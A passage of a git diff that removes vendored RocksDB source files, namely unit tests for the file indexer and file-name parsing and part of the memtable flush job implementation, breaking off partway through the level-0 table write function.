-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <string>
-#include "db/file_indexer.h"
-#include "db/dbformat.h"
-#include "db/version_edit.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class IntComparator : public Comparator {
- public:
-  int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() == 8);
-    assert(b.size() == 8);
-    int64_t diff = *reinterpret_cast<const int64_t*>(a.data()) -
-                   *reinterpret_cast<const int64_t*>(b.data());
-    if (diff < 0) {
-      return -1;
-    } else if (diff == 0) {
-      return 0;
-    } else {
-      return 1;
-    }
-  }
-
-  const char* Name() const override { return "IntComparator"; }
-
-  void FindShortestSeparator(std::string* start,
-                             const Slice& limit) const override {}
-
-  void FindShortSuccessor(std::string* key) const override {}
-};
-
-class FileIndexerTest : public testing::Test {
- public:
-  FileIndexerTest()
-      : kNumLevels(4), files(new std::vector<FileMetaData*>[kNumLevels]) {}
-
-  ~FileIndexerTest() {
-    ClearFiles();
-    delete[] files;
-  }
-
-  void AddFile(int level, int64_t smallest, int64_t largest) {
-    auto* f = new FileMetaData();
-    f->smallest = IntKey(smallest);
-    f->largest = IntKey(largest);
-    files[level].push_back(f);
-  }
-
-  InternalKey IntKey(int64_t v) {
-    return InternalKey(Slice(reinterpret_cast<char*>(&v), 8), 0, kTypeValue);
-  }
-
-  void ClearFiles() {
-    for (uint32_t i = 0; i < kNumLevels; ++i) {
-      for (auto* f : files[i]) {
-        delete f;
-      }
-      files[i].clear();
-    }
-  }
-
-  void GetNextLevelIndex(const uint32_t level, const uint32_t file_index,
-      const int cmp_smallest, const int cmp_largest, int32_t* left_index,
-      int32_t* right_index) {
-    *left_index = 100;
-    *right_index = 100;
-    indexer->GetNextLevelIndex(level, file_index, cmp_smallest, cmp_largest,
-                               left_index, right_index);
-  }
-
-  int32_t left = 100;
-  int32_t right = 100;
-  const uint32_t kNumLevels;
-  IntComparator ucmp;
-  FileIndexer* indexer;
-
-  std::vector<FileMetaData*>* files;
-};
-
-// Case 0: Empty
-TEST_F(FileIndexerTest, Empty) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  indexer->UpdateIndex(&arena, 0, files);
-  delete indexer;
-}
-
-// Case 1: no overlap, files are on the left of next level files
-TEST_F(FileIndexerTest, no_overlap_left) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 100, 200);
-  AddFile(1, 300, 400);
-  AddFile(1, 500, 600);
-  // level 2
-  AddFile(2, 1500, 1600);
-  AddFile(2, 1601, 1699);
-  AddFile(2, 1700, 1800);
-  // level 3
-  AddFile(3, 2500, 2600);
-  AddFile(3, 2601, 2699);
-  AddFile(3, 2700, 2800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t level = 1; level < 3; ++level) {
-    for (uint32_t f = 0; f < 3; ++f) {
-      GetNextLevelIndex(level, f, -1, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 0, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, 0, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, 1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(2, right);
-    }
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-// Case 2: no overlap, files are on the right of next level files
-TEST_F(FileIndexerTest, no_overlap_right) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 2100, 2200);
-  AddFile(1, 2300, 2400);
-  AddFile(1, 2500, 2600);
-  // level 2
-  AddFile(2, 1500, 1600);
-  AddFile(2, 1501, 1699);
-  AddFile(2, 1700, 1800);
-  // level 3
-  AddFile(3, 500, 600);
-  AddFile(3, 501, 699);
-  AddFile(3, 700, 800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t level = 1; level < 3; ++level) {
-    for (uint32_t f = 0; f < 3; ++f) {
-      GetNextLevelIndex(level, f, -1, -1, &left, &right);
-      ASSERT_EQ(f == 0 ? 0 : 3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 0, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, 0, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, 1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-    }
-  }
-  delete indexer;
-}
-
-// Case 3: empty L2
-TEST_F(FileIndexerTest, empty_L2) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  for (uint32_t i = 1; i < kNumLevels; ++i) {
-    ASSERT_EQ(0U, indexer->LevelIndexSize(i));
-  }
-  // level 1
-  AddFile(1, 2100, 2200);
-  AddFile(1, 2300, 2400);
-  AddFile(1, 2500, 2600);
-  // level 3
-  AddFile(3, 500, 600);
-  AddFile(3, 501, 699);
-  AddFile(3, 700, 800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t f = 0; f < 3; ++f) {
-    GetNextLevelIndex(1, f, -1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 0, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, 0, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, 1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-// Case 4: mixed
-TEST_F(FileIndexerTest, mixed) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 100, 200);
-  AddFile(1, 250, 400);
-  AddFile(1, 450, 500);
-  // level 2
-  AddFile(2, 100, 150);  // 0
-  AddFile(2, 200, 250);  // 1
-  AddFile(2, 251, 300);  // 2
-  AddFile(2, 301, 350);  // 3
-  AddFile(2, 500, 600);  // 4
-  // level 3
-  AddFile(3, 0, 50);
-  AddFile(3, 100, 200);
-  AddFile(3, 201, 250);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  // level 1, 0
-  GetNextLevelIndex(1, 0, -1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(0, right);
-  GetNextLevelIndex(1, 0, 0, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(0, right);
-  GetNextLevelIndex(1, 0, 1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 0, 1, 0, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 0, 1, 1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(4, right);
-  // level 1, 1
-  GetNextLevelIndex(1, 1, -1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 1, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 1, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 1, 1, 0, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 1, 1, 1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  // level 1, 2
-  GetNextLevelIndex(1, 2, -1, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 2, 0, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 2, 1, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  GetNextLevelIndex(1, 2, 1, 0, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  GetNextLevelIndex(1, 2, 1, 1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  // level 2, 0
-  GetNextLevelIndex(2, 0, -1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, 0, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, 1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(2, right);
-  // level 2, 1
-  GetNextLevelIndex(2, 1, -1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 1, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 1, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(2, right);
-  GetNextLevelIndex(2, 1, 1, 0, &left, &right);
-  ASSERT_EQ(2, left);
-  ASSERT_EQ(2, right);
-  GetNextLevelIndex(2, 1, 1, 1, &left, &right);
-  ASSERT_EQ(2, left);
-  ASSERT_EQ(2, right);
-  // level 2, [2 - 4], no overlap
-  for (uint32_t f = 2; f <= 4; ++f) {
-    GetNextLevelIndex(2, f, -1, -1, &left, &right);
-    ASSERT_EQ(f == 2 ? 2 : 3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 0, -1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, -1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, 0, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, 1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/filename_test.cc b/thirdparty/rocksdb/db/filename_test.cc
deleted file mode 100644
index d6bde52..0000000
--- a/thirdparty/rocksdb/db/filename_test.cc
+++ /dev/null
@@ -1,180 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/filename.h"
-
-#include "db/dbformat.h"
-#include "port/port.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class FileNameTest : public testing::Test {};
-
-TEST_F(FileNameTest, Parse) {
-  Slice db;
-  FileType type;
-  uint64_t number;
-
-  char kDefautInfoLogDir = 1;
-  char kDifferentInfoLogDir = 2;
-  char kNoCheckLogDir = 4;
-  char kAllMode = kDefautInfoLogDir | kDifferentInfoLogDir | kNoCheckLogDir;
-
-  // Successful parses
-  static struct {
-    const char* fname;
-    uint64_t number;
-    FileType type;
-    char mode;
-  } cases[] = {
-        {"100.log", 100, kLogFile, kAllMode},
-        {"0.log", 0, kLogFile, kAllMode},
-        {"0.sst", 0, kTableFile, kAllMode},
-        {"CURRENT", 0, kCurrentFile, kAllMode},
-        {"LOCK", 0, kDBLockFile, kAllMode},
-        {"MANIFEST-2", 2, kDescriptorFile, kAllMode},
-        {"MANIFEST-7", 7, kDescriptorFile, kAllMode},
-        {"METADB-2", 2, kMetaDatabase, kAllMode},
-        {"METADB-7", 7, kMetaDatabase, kAllMode},
-        {"LOG", 0, kInfoLogFile, kDefautInfoLogDir},
-        {"LOG.old", 0, kInfoLogFile, kDefautInfoLogDir},
-        {"LOG.old.6688", 6688, kInfoLogFile, kDefautInfoLogDir},
-        {"rocksdb_dir_LOG", 0, kInfoLogFile, kDifferentInfoLogDir},
-        {"rocksdb_dir_LOG.old", 0, kInfoLogFile, kDifferentInfoLogDir},
-        {"rocksdb_dir_LOG.old.6688", 6688, kInfoLogFile, kDifferentInfoLogDir},
-        {"18446744073709551615.log", 18446744073709551615ull, kLogFile,
-         kAllMode}, };
-  for (char mode : {kDifferentInfoLogDir, kDefautInfoLogDir, kNoCheckLogDir}) {
-    for (unsigned int i = 0; i < sizeof(cases) / sizeof(cases[0]); i++) {
-      InfoLogPrefix info_log_prefix(mode != kDefautInfoLogDir, "/rocksdb/dir");
-      if (cases[i].mode & mode) {
-        std::string f = cases[i].fname;
-        if (mode == kNoCheckLogDir) {
-          ASSERT_TRUE(ParseFileName(f, &number, &type)) << f;
-        } else {
-          ASSERT_TRUE(ParseFileName(f, &number, info_log_prefix.prefix, &type))
-              << f;
-        }
-        ASSERT_EQ(cases[i].type, type) << f;
-        ASSERT_EQ(cases[i].number, number) << f;
-      }
-    }
-  }
-
-  // Errors
-  static const char* errors[] = {
-    "",
-    "foo",
-    "foo-dx-100.log",
-    ".log",
-    "",
-    "manifest",
-    "CURREN",
-    "CURRENTX",
-    "MANIFES",
-    "MANIFEST",
-    "MANIFEST-",
-    "XMANIFEST-3",
-    "MANIFEST-3x",
-    "META",
-    "METADB",
-    "METADB-",
-    "XMETADB-3",
-    "METADB-3x",
-    "LOC",
-    "LOCKx",
-    "LO",
-    "LOGx",
-    "18446744073709551616.log",
-    "184467440737095516150.log",
-    "100",
-    "100.",
-    "100.lop"
-  };
-  for (unsigned int i = 0; i < sizeof(errors) / sizeof(errors[0]); i++) {
-    std::string f = errors[i];
-    ASSERT_TRUE(!ParseFileName(f, &number, &type)) << f;
-  };
-}
-
-TEST_F(FileNameTest, InfoLogFileName) {
-  std::string dbname = ("/data/rocksdb");
-  std::string db_absolute_path;
-  Env::Default()->GetAbsolutePath(dbname, &db_absolute_path);
-
-  ASSERT_EQ("/data/rocksdb/LOG", InfoLogFileName(dbname, db_absolute_path, ""));
-  ASSERT_EQ("/data/rocksdb/LOG.old.666",
-            OldInfoLogFileName(dbname, 666u, db_absolute_path, ""));
-
-  ASSERT_EQ("/data/rocksdb_log/data_rocksdb_LOG",
-            InfoLogFileName(dbname, db_absolute_path, "/data/rocksdb_log"));
-  ASSERT_EQ(
-      "/data/rocksdb_log/data_rocksdb_LOG.old.666",
-      OldInfoLogFileName(dbname, 666u, db_absolute_path, "/data/rocksdb_log"));
-}
-
-TEST_F(FileNameTest, Construction) {
-  uint64_t number;
-  FileType type;
-  std::string fname;
-
-  fname = CurrentFileName("foo");
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(0U, number);
-  ASSERT_EQ(kCurrentFile, type);
-
-  fname = LockFileName("foo");
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(0U, number);
-  ASSERT_EQ(kDBLockFile, type);
-
-  fname = LogFileName("foo", 192);
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(192U, number);
-  ASSERT_EQ(kLogFile, type);
-
-  fname = TableFileName({DbPath("bar", 0)}, 200, 0);
-  std::string fname1 =
-      TableFileName({DbPath("foo", 0), DbPath("bar", 0)}, 200, 1);
-  ASSERT_EQ(fname, fname1);
-  ASSERT_EQ("bar/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(200U, number);
-  ASSERT_EQ(kTableFile, type);
-
-  fname = DescriptorFileName("bar", 100);
-  ASSERT_EQ("bar/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(100U, number);
-  ASSERT_EQ(kDescriptorFile, type);
-
-  fname = TempFileName("tmp", 999);
-  ASSERT_EQ("tmp/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(999U, number);
-  ASSERT_EQ(kTempFile, type);
-
-  fname = MetaDatabaseName("met", 100);
-  ASSERT_EQ("met/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(100U, number);
-  ASSERT_EQ(kMetaDatabase, type);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/flush_job.cc b/thirdparty/rocksdb/db/flush_job.cc
deleted file mode 100644
index 778c9ec..0000000
--- a/thirdparty/rocksdb/db/flush_job.cc
+++ /dev/null
@@ -1,362 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/flush_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include <algorithm>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/merge_context.h"
-#include "db/version_set.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "db/memtable.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/event_logger.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-FlushJob::FlushJob(const std::string& dbname, ColumnFamilyData* cfd,
-                   const ImmutableDBOptions& db_options,
-                   const MutableCFOptions& mutable_cf_options,
-                   const EnvOptions& env_options, VersionSet* versions,
-                   InstrumentedMutex* db_mutex,
-                   std::atomic<bool>* shutting_down,
-                   std::vector<SequenceNumber> existing_snapshots,
-                   SequenceNumber earliest_write_conflict_snapshot,
-                   JobContext* job_context, LogBuffer* log_buffer,
-                   Directory* db_directory, Directory* output_file_directory,
-                   CompressionType output_compression, Statistics* stats,
-                   EventLogger* event_logger, bool measure_io_stats)
-    : dbname_(dbname),
-      cfd_(cfd),
-      db_options_(db_options),
-      mutable_cf_options_(mutable_cf_options),
-      env_options_(env_options),
-      versions_(versions),
-      db_mutex_(db_mutex),
-      shutting_down_(shutting_down),
-      existing_snapshots_(std::move(existing_snapshots)),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      job_context_(job_context),
-      log_buffer_(log_buffer),
-      db_directory_(db_directory),
-      output_file_directory_(output_file_directory),
-      output_compression_(output_compression),
-      stats_(stats),
-      event_logger_(event_logger),
-      measure_io_stats_(measure_io_stats),
-      pick_memtable_called(false) {
-  // Update the thread status to indicate flush.
-  ReportStartedFlush();
-  TEST_SYNC_POINT("FlushJob::FlushJob()");
-}
-
-FlushJob::~FlushJob() {
-  ThreadStatusUtil::ResetThreadStatus();
-}
-
-void FlushJob::ReportStartedFlush() {
-  ThreadStatusUtil::SetColumnFamily(cfd_, cfd_->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-  ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_FLUSH);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_JOB_ID,
-      job_context_->job_id);
-  IOSTATS_RESET(bytes_written);
-}
-
-void FlushJob::ReportFlushInputSize(const autovector<MemTable*>& mems) {
-  uint64_t input_size = 0;
-  for (auto* mem : mems) {
-    input_size += mem->ApproximateMemoryUsage();
-  }
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::FLUSH_BYTES_MEMTABLES,
-      input_size);
-}
-
-void FlushJob::RecordFlushIOStats() {
-  RecordTick(stats_, FLUSH_WRITE_BYTES, IOSTATS(bytes_written));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::FLUSH_BYTES_WRITTEN, IOSTATS(bytes_written));
-  IOSTATS_RESET(bytes_written);
-}
-
-void FlushJob::PickMemTable() {
-  db_mutex_->AssertHeld();
-  assert(!pick_memtable_called);
-  pick_memtable_called = true;
-  // Save the contents of the earliest memtable as a new Table
-  cfd_->imm()->PickMemtablesToFlush(&mems_);
-  if (mems_.empty()) {
-    return;
-  }
-
-  ReportFlushInputSize(mems_);
-
-  // entries mems are (implicitly) sorted in ascending order by their created
-  // time. We will use the first memtable's `edit` to keep the meta info for
-  // this flush.
-  MemTable* m = mems_[0];
-  edit_ = m->GetEdits();
-  edit_->SetPrevLogNumber(0);
-  // SetLogNumber(log_num) indicates logs with number smaller than log_num
-  // will no longer be picked up for recovery.
-  edit_->SetLogNumber(mems_.back()->GetNextLogNumber());
-  edit_->SetColumnFamily(cfd_->GetID());
-
-  // path 0 for level 0 file.
-  meta_.fd = FileDescriptor(versions_->NewFileNumber(), 0, 0);
-
-  base_ = cfd_->current();
-  base_->Ref();  // it is likely that we do not need this reference
-}
-
-Status FlushJob::Run(FileMetaData* file_meta) {
-  db_mutex_->AssertHeld();
-  assert(pick_memtable_called);
-  AutoThreadOperationStageUpdater stage_run(
-      ThreadStatus::STAGE_FLUSH_RUN);
-  if (mems_.empty()) {
-    ROCKS_LOG_BUFFER(log_buffer_, "[%s] Nothing in memtable to flush",
-                     cfd_->GetName().c_str());
-    return Status::OK();
-  }
-
-  // I/O measurement variables
-  PerfLevel prev_perf_level = PerfLevel::kEnableTime;
-  uint64_t prev_write_nanos = 0;
-  uint64_t prev_fsync_nanos = 0;
-  uint64_t prev_range_sync_nanos = 0;
-  uint64_t prev_prepare_write_nanos = 0;
-  if (measure_io_stats_) {
-    prev_perf_level = GetPerfLevel();
-    SetPerfLevel(PerfLevel::kEnableTime);
-    prev_write_nanos = IOSTATS(write_nanos);
-    prev_fsync_nanos = IOSTATS(fsync_nanos);
-    prev_range_sync_nanos = IOSTATS(range_sync_nanos);
-    prev_prepare_write_nanos = IOSTATS(prepare_write_nanos);
-  }
-
-  // This will release and re-acquire the mutex.
-  Status s = WriteLevel0Table();
-
-  if (s.ok() &&
-      (shutting_down_->load(std::memory_order_acquire) || cfd_->IsDropped())) {
-    s = Status::ShutdownInProgress(
-        "Database shutdown or Column family drop during flush");
-  }
-
-  if (!s.ok()) {
-    cfd_->imm()->RollbackMemtableFlush(mems_, meta_.fd.GetNumber());
-  } else {
-    TEST_SYNC_POINT("FlushJob::InstallResults");
-    // Replace immutable memtable with the generated Table
-    s = cfd_->imm()->InstallMemtableFlushResults(
-        cfd_, mutable_cf_options_, mems_, versions_, db_mutex_,
-        meta_.fd.GetNumber(), &job_context_->memtables_to_free, db_directory_,
-        log_buffer_);
-  }
-
-  if (s.ok() && file_meta != nullptr) {
-    *file_meta = meta_;
-  }
-  RecordFlushIOStats();
-
-  auto stream = event_logger_->LogToBuffer(log_buffer_);
-  stream << "job" << job_context_->job_id << "event"
-         << "flush_finished";
-  stream << "lsm_state";
-  stream.StartArray();
-  auto vstorage = cfd_->current()->storage_info();
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    stream << vstorage->NumLevelFiles(level);
-  }
-  stream.EndArray();
-  stream << "immutable_memtables" << cfd_->imm()->NumNotFlushed();
-
-  if (measure_io_stats_) {
-    if (prev_perf_level != PerfLevel::kEnableTime) {
-      SetPerfLevel(prev_perf_level);
-    }
-    stream << "file_write_nanos" << (IOSTATS(write_nanos) - prev_write_nanos);
-    stream << "file_range_sync_nanos"
-           << (IOSTATS(range_sync_nanos) - prev_range_sync_nanos);
-    stream << "file_fsync_nanos" << (IOSTATS(fsync_nanos) - prev_fsync_nanos);
-    stream << "file_prepare_write_nanos"
-           << (IOSTATS(prepare_write_nanos) - prev_prepare_write_nanos);
-  }
-
-  return s;
-}
-
-void FlushJob::Cancel() {
-  db_mutex_->AssertHeld();
-  assert(base_ != nullptr);
-  base_->Unref();
-}
-
-Status FlushJob::WriteLevel0Table() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_FLUSH_WRITE_L0);
-  db_mutex_->AssertHeld();
-  const uint64_t start_micros = db_options_.env->NowMicros();
-  Status s;
-  {
-    db_mutex_->Unlock();
-    if (log_buffer_) {
-      log_buffer_->FlushBufferToLog();
-    }
-    // memtables and range_del_iters store internal iterators over each data
-    // memtable and its associated range deletion memtable, respectively, at
-    // corresponding indexes.
-    std::vector<InternalIterator*> memtables;
-    std::vector<InternalIterator*> range_del_iters;
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    Arena arena;
-    uint64_t total_num_entries = 0, total_num_deletes = 0;
-    size_t total_memory_usage = 0;
-    for (MemTable* m : mems_) {
-      ROCKS_LOG_INFO(
-          db_options_.info_log,
-          "[%s] [JOB %d] Flushing memtable with next log file: %" PRIu64 "\n",
-          cfd_->GetName().c_str(), job_context_->job_id, m->GetNextLogNumber());
-      memtables.push_back(m->NewIterator(ro, &arena));
-      auto* range_del_iter = m->NewRangeTombstoneIterator(ro);
-      if (range_del_iter != nullptr) {
-        range_del_iters.push_back(range_del_iter);
-      }
-      total_num_entries += m->num_entries();
-      total_num_deletes += m->num_deletes();
-      total_memory_usage += m->ApproximateMemoryUsage();
-    }
-
-    event_logger_->Log() << "job" << job_context_->job_id << "event"
-                         << "flush_started"
-                         << "num_memtables" << mems_.size() << "num_entries"
-                         << total_num_entries << "num_deletes"
-                         << total_num_deletes << "memory_usage"
-                         << total_memory_usage;
-
-    {
-      ScopedArenaIterator iter(
-          NewMergingIterator(&cfd_->internal_comparator(), &memtables[0],
-                             static_cast<int>(memtables.size()), &arena));
-      std::unique_ptr<InternalIterator> range_del_iter(NewMergingIterator(
-          &cfd_->internal_comparator(),
-          range_del_iters.empty() ? nullptr : &range_del_iters[0],
-          static_cast<int>(range_del_iters.size())));
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "[%s] [JOB %d] Level-0 flush table #%" PRIu64 ": started",
-                     cfd_->GetName().c_str(), job_context_->job_id,
-                     meta_.fd.GetNumber());
-
-      TEST_SYNC_POINT_CALLBACK("FlushJob::WriteLevel0Table:output_compression",
-                               &output_compression_);
-      EnvOptions optimized_env_options =
-          db_options_.env->OptimizeForCompactionTableWrite(env_options_, db_options_);
-
-      int64_t _current_time = 0;
-      db_options_.env->GetCurrentTime(&_current_time);  // ignore error
-      const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-      uint64_t oldest_key_time = mems_.front()->ApproximateOldestKeyTime();
-
-      s = BuildTable(
-          dbname_, db_options_.env, *cfd_->ioptions(), mutable_cf_options_,
-          optimized_env_options, cfd_->table_cache(), iter.get(),
-          std::move(range_del_iter), &meta_, cfd_->internal_comparator(),
-          cfd_->int_tbl_prop_collector_factories(), cfd_->GetID(),
-          cfd_->GetName(), existing_snapshots_,
-          earliest_write_conflict_snapshot_, output_compression_,
-          cfd_->ioptions()->compression_opts,
-          mutable_cf_options_.paranoid_file_checks, cfd_->internal_stats(),
-          TableFileCreationReason::kFlush, event_logger_, job_context_->job_id,
-          Env::IO_HIGH, &table_properties_, 0 /* level */, current_time,
-          oldest_key_time);
-      LogFlush(db_options_.info_log);
-    }
